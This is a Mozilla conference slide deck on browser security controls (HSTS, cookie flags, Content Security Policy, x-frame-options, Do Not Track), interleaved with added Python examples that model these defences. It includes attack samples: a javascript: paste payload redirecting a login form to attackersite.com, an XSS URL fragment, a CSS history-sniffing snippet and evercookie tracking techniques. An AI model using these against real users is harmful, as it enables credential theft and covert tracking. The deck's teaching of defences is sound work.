Enabling Browser Security in Web Applications
Topics:
Locking Down SSL/TLS
Stamping Out Cross Site Scripting
Socio-Technical Attacks
Privacy
Technologies Covered:
HTTP Strict Transport Security, Content Security Policy, X-frame-options, Do Not Track
2. About
• Michael Coates
• Senior Manager, Mozilla
• Lead of Infrastructure Security Team
• mcoates@mozilla.com
• http://blog.mozilla.com/webappsec/
• http://michael-coates.blogspot.com
• @_mwc
OWASP 2
4. Locking Down SSL/TLS
Fake certificate attack targets Facebook users in Syria
May, 2011 - theregister.co.uk
How to Hijack Facebook Using Firesheep
October, 2010 - pcworld.com
Leaked Report: ISP Secretly Added Spy Code To Web Sessions, Crashing Browsers
June, 2008 - wired.com
Internet traffic was routed via Chinese servers, U.S. military sites included
November, 2010 - washingtontimes.com
5. Risks of Insecure Communication
High likelihood of attack: open wifi, municipal wifi, malicious ISP
Easy to exploit
High impact to user: clandestine monitoring of population, injection of incorrect/malicious content
No protection from any defensive systems
Design flaw in application
6. Insecure Session Management
Secure login over HTTPS
Password submitted encrypted
Immediate redirect to HTTP
Session ID sent cleartext <-- vulnerability point
[Diagram: Firesheep attack. The login request and response go to https://site.com/login; the following request to http://site.com/profile carries the session cookie in cleartext, where it can be captured.]
8. Secure Design for Communication
HTTP Strict Transport Security (HSTS)
Opt-in security control
Website instructs compatible browser to enable STS for site
HSTS Forces (for enabled site):
All communication over HTTPS
No insecure HTTP requests sent from browser
No option for user to override untrusted certificates
9. Strict Transport Security
Browser prevents HTTP requests to HSTS site
Any request to site is “upgraded” to HTTPS
No clear text HTTP traffic ever sent to HSTS site
Browser assumes HTTPS for HSTS sites
[Diagram: a request to http://site.com is rewritten to https://site.com inside the browser before it is sent; no HTTP traffic leaves the browser.]
11. HSTS FAQ
Is HSTS Cert Pinning? No
Chicken and the Egg? Technically, but drastically less chance of attack
Certificate Rotation Problem? No - HSTS forces valid certificate, doesn’t specify which
Browser Support: Current: Firefox & Chrome
https://www.owasp.org/index.php/HTTP_Strict_Transport_Security#Browser_Support
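The browser-side behaviour the HSTS slides describe (remember the host, upgrade http:// to https://, refuse the certificate-error override), as an added example that is not code from the talk. The header name and the max-age / includeSubDomains directives are from the HSTS draft linked on slide 14; the HstsStore class, the rule that the header is only honoured on an HTTPS response, and the site.com values are this example's own. It also shows the chicken-and-egg case from the FAQ: before the site has ever been reached over HTTPS there is no policy, so the first plain-HTTP request goes out unchanged.

```python
"""Browser-side model of HTTP Strict Transport Security (added example)."""
import time
from urllib.parse import urlsplit, urlunsplit


class HstsStore:
    """Hosts for which the browser has switched Strict Transport Security on."""

    def __init__(self):
        self._hosts = {}   # host -> (expiry as epoch seconds, include_subdomains)

    def process_response(self, host, headers, over_https, now=None):
        """Record the policy carried by a Strict-Transport-Security response header.

        `headers` maps response header names to values. The header is only
        honoured when the response itself arrived over HTTPS; a plain-HTTP
        response could have been injected by the very attacker HSTS exists
        to stop. `now` overrides the clock so the behaviour is testable.
        """
        now = time.time() if now is None else now
        if not over_https:
            return
        value = next((v for k, v in headers.items()
                      if k.lower() == "strict-transport-security"), None)
        if value is None:
            return
        max_age, include_sub = None, False
        for directive in value.split(";"):
            name, _, arg = directive.strip().partition("=")
            name, arg = name.strip().lower(), arg.strip()
            if name == "max-age" and arg.isdigit():
                max_age = int(arg)
            elif name == "includesubdomains":
                include_sub = True
        if max_age is None:
            return                                   # malformed header: ignore it
        if max_age == 0:
            self._hosts.pop(host.lower(), None)      # max-age=0 withdraws the policy
            return
        self._hosts[host.lower()] = (now + max_age, include_sub)

    def is_hsts_host(self, host, now=None):
        """True if `host`, or a parent domain with includeSubDomains, has an unexpired policy."""
        now = time.time() if now is None else now
        labels = host.lower().split(".")
        for i in range(len(labels)):
            entry = self._hosts.get(".".join(labels[i:]))
            if entry is None:
                continue
            expiry, include_sub = entry
            if expiry > now and (i == 0 or include_sub):
                return True
        return False

    def rewrite_url(self, url, now=None):
        """Upgrade http:// to https:// for HSTS hosts; any other URL is returned unchanged."""
        p = urlsplit(url)
        if p.scheme != "http" or not self.is_hsts_host(p.hostname or "", now):
            return url
        # Port 80 was implicit for http; drop it so the https default applies.
        netloc = p.hostname if p.port in (None, 80) else f"{p.hostname}:{p.port}"
        return urlunsplit(("https", netloc, p.path, p.query, p.fragment))

    def cert_error_allows_override(self, host, now=None):
        """For HSTS hosts the 'add an exception' path for a bad certificate is gone."""
        return not self.is_hsts_host(host, now)


if __name__ == "__main__":
    store = HstsStore()
    print(store.rewrite_url("http://site.com/profile"))        # first visit: no policy yet
    store.process_response("site.com", {"Strict-Transport-Security": "max-age=31536000"}, over_https=True)
    print(store.rewrite_url("http://site.com/profile"))        # now upgraded to https
```

The expiry check matters in practice: a site that lets its policy lapse silently puts its users back on the first-visit footing, so the max-age on the real header should be long and refreshed on every HTTPS response.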
12. Protecting Outdated Users
HSTS supported in current browsers (Firefox, Chrome)
Older browsers all support SECURE Cookie Flag
SECURE cookie flag
Instructs browser to only send cookie over HTTPS
Much less (and different) protection than HSTS, but good defense in depth control
13. Secure Flag
SECURE Flag doesn’t prevent HTTP requests like HSTS
Just removes SECURE Cookies from HTTP request
[Diagram: the same request/response flow as slide 6. The cookie marked SECURE is included on the HTTPS request and omitted from the later HTTP request.]
14. Defensive Design
HTTP Strict Transport Security
http://tools.ietf.org/html/draft-hodges-strict-transport-sec
Set SECURE flag for cookies
Secure application design for TLS
https://www.owasp.org/index.php/Transport_Layer_Protection_Cheat_Sheet
16. Risks of XSS
Top Web Security Issue on OWASP Top 10 (2011, 2007, 2004)
Impact: Vulnerability allows attacker to change any aspect of a vulnerable web page
Business Impact:
Compromise of user accounts
False data displayed on website
Remote monitoring of user actions with website
Full attacker control of content displayed and served from website
17. XSS Example
(1) Attacker submits malicious code (javascript entered into the Name field of a form)
(2) Code is now part of webpage (the injected script sits inside the page's login form markup: <div class="featured"> <form action="/en-US/firefox/users/login" method="post" id="login" class="featured-inner object-lead"> ... <input type="hidden" name="data[Login][referer]" ...)
(3) Malicious site steals passwords & installs malware (the login form now submits to the evil site)
(4) Attacker spreads malicious URL: http://site.com/?a=%3cscript%3edocument%2e
18. Frustrating Problem
XSS issues can occur anywhere user data is used in a webpage
Difficult to identify all output locations
Many frameworks allow design patterns that lead to XSS issues
19. Content Security Policy (CSP)
CSP - New defensive control to eliminate XSS
Allows web site to specify where JavaScript can be loaded from
Injected JavaScript via XSS is rendered inert
Violations & potential XSS attacks are reported to web site for investigation
CSP Policy example header:
X-Content-Security-Policy: allow 'self'; img-src 'self' data:
20. XSS Example with CSP
(1) Attacker submits malicious code (javascript entered into the Name field of a form)
(2) CSP prevents script execution; violation report sent to site.com/CSPalert
(3) Site safe to use
[Diagram: the page source still contains the injected script inside the login form markup (<div class="featured"> <form action="/en-US/firefox/users/login" method="post" id="login" class="featured-inner object-lead"> ... <input type="hidden" name="data[Login][referer]" value="/en-US/developers/addons" id="LoginReferer" />), but the browser does not execute it.]
21. Implementing CSP
Some code changes needed to externalize JavaScript
Run CSP in report only mode to test
Enable CSP and protect users with browsers supporting CSP
Receive alerts on potential vulnerabilities in app and quickly address to protect remaining users
22. CSP Violation Reporting
Violations of CSP policy reported to specified URL
Acts as XSS intrusion detection system
CSP supported in portion of site users, XSS IDS benefits all
Reported data is from client, trust accordingly
Example header:
X-Content-Security-Policy: allow self; report-uri http://reportcollector.example.com/collector.cgi
25. Other CSP Benefits
Prevent ClickJacking via frame-ancestors
Control embedded frames via frame-src
Control domains for images via img-src
Control target domains via xhr-src
Enforce specific protocols (https://*.foo.com)
Future enhancement to control actions & malicious forms
26. Protecting Outdated Users
HTTPOnly mitigates one of XSS impacts - session hijacking
Supported in all recent browsers
Easy, opt-in security control to protect users
[Diagram: injected javascript on the page tries to send "Cookie: SessionID" to the attacker's site; with HTTPOnly the cookie is not readable by script.]
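Both cookie flags the talk recommends, SECURE (slides 12 and 13) and HTTPOnly (slide 26), shown from the two sides that matter: the Set-Cookie value a login handler emits, and the two checks a browser then applies to it. This is an added example, not code from the talk; the cookie names, the site.com URLs and the small CookieJar class are made up for it.

```python
"""Set-Cookie flags and the browser behaviour they switch on (added example)."""
from http.cookies import SimpleCookie
from urllib.parse import urlsplit


def set_cookie_header(name, value, secure=True, httponly=True, path="/"):
    """Return the value of the Set-Cookie response header a login handler should send."""
    c = SimpleCookie()
    c[name] = value
    c[name]["path"] = path
    c[name]["secure"] = secure       # browser sends it over HTTPS only
    c[name]["httponly"] = httponly   # browser hides it from document.cookie
    return c[name].OutputString()


class CookieJar:
    """Minimal model of a browser cookie jar, keyed by host."""

    def __init__(self):
        self._cookies = []   # dicts with host, name, value, secure, httponly

    def store(self, host, set_cookie_value):
        """Parse a Set-Cookie header received from `host` and remember its flags."""
        c = SimpleCookie()
        c.load(set_cookie_value)
        for name, morsel in c.items():
            self._cookies = [k for k in self._cookies
                             if not (k["host"] == host and k["name"] == name)]
            self._cookies.append({
                "host": host, "name": name, "value": morsel.value,
                "secure": bool(morsel["secure"]),
                "httponly": bool(morsel["httponly"]),
            })

    def cookie_header(self, url):
        """Cookie request header for `url`: SECURE cookies only go on https:// requests.

        Note what the slide points out: the plain-HTTP request itself still
        happens, it just leaves without the SECURE cookie.
        """
        p = urlsplit(url)
        sent = [k for k in self._cookies
                if k["host"] == p.hostname and (p.scheme == "https" or not k["secure"])]
        return "; ".join(f"{k['name']}={k['value']}" for k in sent)

    def document_cookie(self, host):
        """What script running on the page sees: HTTPOnly cookies are excluded."""
        return "; ".join(f"{k['name']}={k['value']}" for k in self._cookies
                         if k["host"] == host and not k["httponly"])


if __name__ == "__main__":
    jar = CookieJar()
    jar.store("site.com", set_cookie_header("sessionid", "abc123"))
    jar.store("site.com", set_cookie_header("theme", "dark", secure=False, httponly=False))
    print("https request:", jar.cookie_header("https://site.com/profile"))
    print("http request: ", jar.cookie_header("http://site.com/profile"))
    print("document.cookie:", jar.document_cookie("site.com"))
```

The session cookie is the one that needs both flags; a preference cookie such as the theme can stay readable. HTTPOnly only blocks the cookie-theft impact of an XSS, as the slide says: script that runs in the page can still act on the user's behalf with the cookie the browser attaches automatically.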
27. Defensive Design
CSP gaining traction, potential to solve pressing web security risk
HTTPOnly flag - easy setting to add additional layer of defense
OWASP XSS Prevention Cheat Sheet
https://www.owasp.org/index.php/XSS_%28Cross_Site_Scripting%29_Prevention_Cheat_Sheet
29. ClickJacking
Attacker includes victim page in iframe & overlays opaque layer
Attacker’s image entices click and text interaction
Clicks are registered on victim site underneath
User inadvertently performs action at victim site
[Diagram: layers labelled "Victim Site" underneath "Attacker’s Overlay", with the attacker's image and text on top.]
30. ClickJacking Example
[Screenshot: overlay shown to the user: "Click the Bouncing Ball". Victim page underneath: "Click to follow Joe", checkbox "Grant Joe full profile access", "Confirm" button.]
31. ClickJacking Defenses
x-frame-options header
Full solution
Compatible with new versions of browsers
Frame Busting Scripts
Partial solution
Compatible with older browsers
32. x-frame-options
Additional header for HTTP Response
Instructs browser to disallow framing
Two options - DENY, SAMEORIGIN

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;
Vary: Accept-Encoding
Content-Length: 35236
x-frame-options: DENY

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;
Vary: Accept-Encoding
Content-Length: 35236
x-frame-options: SAMEORIGIN
33. x-frame-options
Targeted site not displayed if framed
Error page displayed
Prevents ClickJacking attack
[Diagram: "Attempted ClickJack" shows the Victim Site under the Attacker’s Overlay; "x-f-o Result" shows the framed victim page not rendered.]
34. Frame Busting Scripts
JavaScript within page to detect framing
Will either “bust” the frame or not display content
<script> if (window.top !== window.self) { window.top.location = window.self.location; } </script>
Not optimal solution - techniques available to bypass defense
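The decision slides 32 and 33 describe, written out as an added example (not the talk's code): a server-side helper that refuses to emit anything but the two documented values, and a browser-side model of what a compatible browser does with the header when the page is framed. The origins used are invented; the rule that contradictory values fail closed and that an unrecognised value gives no protection are this model's own stated assumptions.

```python
"""x-frame-options: emitting it correctly and what the browser does with it (added example)."""
from urllib.parse import urlsplit

DEFAULT_PORTS = {"http": 80, "https": 443}
VALID_MODES = ("DENY", "SAMEORIGIN")


def frame_protection_header(mode):
    """Server side: the (name, value) pair to add to every HTML response.

    Raising on anything but the two documented values catches a misspelling
    such as SAMEORGIN at deploy time, when it is cheap, instead of shipping a
    header the browser silently ignores.
    """
    mode = mode.upper()
    if mode not in VALID_MODES:
        raise ValueError(f"x-frame-options must be one of {VALID_MODES}, got {mode!r}")
    return ("x-frame-options", mode)


def origin_of(url):
    """(scheme, host, port) as the browser's same-origin comparison sees it."""
    p = urlsplit(url)
    return (p.scheme, (p.hostname or "").lower(), p.port or DEFAULT_PORTS.get(p.scheme))


def framing_allowed(headers, page_url, ancestor_urls):
    """Browser side: may the document at `page_url` render inside frames?

    `headers` is that document's response header dict and `ancestor_urls`
    lists the frames above it, top-level first ([] when the page is itself
    the top-level document).
    """
    if not ancestor_urls:
        return True                   # not framed at all; the header is irrelevant
    values = {v.strip().upper() for k, v in headers.items() if k.lower() == "x-frame-options"}
    if not values:
        return True                   # no header: framing allowed, the ClickJacking case
    if len(values) > 1:
        return False                  # contradictory values: this model fails closed (assumption)
    value = values.pop()
    if value == "DENY":
        return False
    if value == "SAMEORIGIN":
        page_origin = origin_of(page_url)
        # Compare every ancestor, not only the top window, so a same-origin frame
        # cannot be used as a wrapper around the protected page inside a foreign one.
        return all(origin_of(a) == page_origin for a in ancestor_urls)
    return True                       # unrecognised value: treated as absent, i.e. no protection (assumption)


if __name__ == "__main__":
    name, value = frame_protection_header("deny")
    page = {"Content-Type": "text/html", name: value}
    print(framing_allowed(page, "https://victim.example/settings", ["https://attacker.example/"]))
```

The server-side check is the part most worth copying: the difference between SAMEORIGIN and SAMEORGIN is invisible in a browser, and a typo in a header value removes the whole control.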
35. URL Social Engineering
“Cool new hidden feature”
“Get 10 free gems for your game”
Click the square and type the secret combination
ctrl+a, ctrl+c, ctrl+l, ctrl+v and enter
36. Danger of those keystrokes...
click square - selected text element
ctrl a - select all text
ctrl c - copy text (the selected text is a javascript:.... URL)
ctrl l - select location bar
ctrl v - paste text
enter - execute JavaScript
The pasted text:
javascript:var xmlHttp;xmlHttp=new XMLHttpRequest();xmlHttp.open("GET", document.location, false);xmlHttp.send();xmlDoc=xmlHttp.responseText;var str=xmlDoc;x.replace(/somesite.com/, "attackersite.com");document.writeln(x);
37. URL JavaScript
Pasted JavaScript has full control of page
Can rewrite page
Extract and send any data
No indication to user
[Diagram: Before - login form (username, password, submit) on somesite.com. After - the same form, now submitting to attackersite.com.]
38. Defense
Code Change to Browser
Remove association between javascript: & loaded document
Renders attack inert
39. Privacy
Your Android Phone is Tracking You
April, 2011 - pcworld.com
Your iPhone Is Tracking Your Every Move
April, 2011 - readwriteweb.com
Mobile-App Makers Face U.S. Privacy Investigation
April, 2011 - online.wsj.com
Nissan car secretly shares driver data with websites
June, 2011 - theregister.co.uk
40. Privacy
Business gains from gathering user data
Privacy infringement based on laws
Privacy concerns based on user expectations
Need better options for user to understand collected data, control flow and accessibility of user data
41. Browser Profiling
Panopticlick
Fingerprints browser based on provided information: plugins installed, font support, screen resolution, time zone
Panopticlick result shown: “Your browser fingerprint appears to be unique among the 1,636,839 tested so far. Currently, we estimate that your browser has a fingerprint that conveys at least 20.64 bits of identifying information.”
42. CSS History Sniffing
Determine user’s browsing habits with CSS
Visited link styled differently than non-visited link (Visited Link / Unvisited Link)
CSS and element inspection determines visited pages
if (getComputedStyle(link, "").color == "rgb(0, 0, 128)") {
  // link.href has not been visited
} else {
  // link.href has been visited
}
Issue fixed March 2010
http://dbaron.org/mozilla/visited-privacy
43. Evercookie
“Its [evercookie] goal is to identify a client even after they've removed standard cookies, Flash cookies (Local Shared Objects or LSOs), and others.”
Multiple methods of storing data on client
Could be abused for unauthorized tracking
Goal to keep user in control of data storage / tracking mechanisms
Storage mechanisms used:
• Standard HTTP Cookies
• Local Shared Objects (Flash Cookies)
• Silverlight Isolated Storage
• Storing cookies in RGB values of auto-generated, force-cached PNGs using HTML5 Canvas tag to read pixels (cookies) back out
• Storing cookies in Web History
• Storing cookies in HTTP ETags
• Storing cookies in Web cache
• window.name caching
• Internet Explorer userData storage
• HTML5 Session Storage
• HTML5 Local Storage
• HTML5 Global Storage
• HTML5 Database Storage via SQLite
http://samy.pl/evercookie/
44. Do Not Track
Adds header DNT: 1 to all web requests
Tells websites user does not want browsing activity to be tracked
http://dnt.mozilla.org/
45. Permission Manager
Granular management options for user interaction with sites (about:permissions)
Control: Location Settings, Cookie Settings, Popup Windows, Offline Storage
47. Closing
Defense In Depth
Many new security controls to enhance security:
Strict Transport Security
Content Security Policy
x-frame-options
Do Not Track
CSP violation report fields:
* request
The HTTP request line leading to the policy violation; this includes the method, resource path, and HTTP version.
* request-headers
The HTTP headers that were sent resulting in a violation of the Content Security Policy.
* blocked-uri
The URI of the resource that was blocked from loading by the Content Security Policy. This is not sent in the case of frame-ancestors violations; in that case, you should assume the blocked URI is the same as the request URI.
* violated-directive
The name of the policy section that was violated.
* original-policy
The original policy as specified by the X-Content-Security-Policy HTTP header.
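A collector for the reports described above, serving both the field list and slide 22's point that the report-uri endpoint is an intrusion detection feed whose data comes from the client. This is an added example, not the talk's code or Mozilla's: it takes the JSON body a browser POSTs to the report-uri, keeps only the five listed fields, strips control characters and caps their length before anything is logged, applies the frame-ancestors fallback the description calls for, and aggregates a batch into counts worth a look. The {"csp-report": {...}} wrapper is an assumption (bodies without it are accepted too), and the sample bodies at the bottom, including their directive strings, are constructed for the example.

```python
"""CSP violation report collector treating reports as untrusted input (added example)."""
import json
from collections import Counter
from urllib.parse import urlsplit

EXPECTED_FIELDS = ("request", "request-headers", "blocked-uri",
                   "violated-directive", "original-policy")
MAX_FIELD_LEN = 2048          # the client chooses the content; cap what gets stored


def request_path(request_line):
    """Resource path from a request line such as 'GET /profile?x=1 HTTP/1.1'."""
    parts = request_line.split()
    return urlsplit(parts[1]).path if len(parts) == 3 else ""


def parse_report(body, max_len=MAX_FIELD_LEN):
    """Turn one POSTed report body into a sanitised dict, or None if it is unusable."""
    try:
        data = json.loads(body)
    except (ValueError, TypeError):
        return None
    if isinstance(data, dict) and isinstance(data.get("csp-report"), dict):
        data = data["csp-report"]       # assumed wrapper; unwrapped bodies are accepted as well
    if not isinstance(data, dict):
        return None
    report = {}
    for field in EXPECTED_FIELDS:
        value = data.get(field, "")
        if not isinstance(value, str):
            return None                 # wrong type: do not guess, drop the report
        value = value.replace("\r", "").replace("\n", " | ")   # one log line per report
        value = "".join(ch for ch in value if ch >= " " or ch == "\t")
        report[field] = value[:max_len]
    if not report["violated-directive"]:
        return None
    # frame-ancestors violations carry no blocked-uri: fall back to the request URI
    if not report["blocked-uri"] and report["violated-directive"].startswith("frame-ancestors"):
        report["blocked-uri"] = request_path(report["request"])
    return report


def blocked_host(report):
    """Host of the blocked resource; '(none)' for inline script, where no URI is sent."""
    uri = report["blocked-uri"]
    return (urlsplit(uri).hostname or uri or "(none)").lower()


def summarize(bodies):
    """Count usable reports by (page path, directive name, blocked host).

    Every report is client-supplied, so the counts are leads to investigate,
    not proof of an attack: one client can send as many as it likes.
    """
    usable = [r for r in (parse_report(b) for b in bodies) if r]
    counts = Counter((request_path(r["request"]),
                      r["violated-directive"].split()[0],
                      blocked_host(r)) for r in usable)
    return {"received": len(bodies), "usable": len(usable), "by_source": dict(counts)}


# Constructed sample bodies: two inline-script violations on the same page (one with
# the csp-report wrapper, one without), one image from a third-party host, one non-JSON body.
SAMPLE_BODIES = [
    json.dumps({"csp-report": {
        "request": "GET /profile?name=%3Cscript%3E HTTP/1.1",
        "request-headers": "Host: site.com\nUser-Agent: Firefox/4.0",
        "blocked-uri": "",
        "violated-directive": "script-src 'self'",
        "original-policy": "allow 'self'; img-src 'self' data:"}}),
    json.dumps({
        "request": "GET /profile?name=%3Cscript%3E HTTP/1.1",
        "request-headers": "Host: site.com",
        "blocked-uri": "",
        "violated-directive": "script-src 'self'",
        "original-policy": "allow 'self'; img-src 'self' data:"}),
    json.dumps({"csp-report": {
        "request": "GET /profile HTTP/1.1",
        "request-headers": "Host: site.com",
        "blocked-uri": "http://evil.example/track.png",
        "violated-directive": "img-src 'self' data:",
        "original-policy": "allow 'self'; img-src 'self' data:"}}),
    "{not json",
]

if __name__ == "__main__":
    result = summarize(SAMPLE_BODIES)
    for key, count in result["by_source"].items():
        print(count, key)
```

Grouping by page path rather than the full request line is deliberate: the query string is where an injected payload usually lives, so keying on it would split one vulnerability into many one-off entries, while the path plus the directive is what points at the template that needs fixing. The raw request line is still kept in the parsed report for the investigation itself.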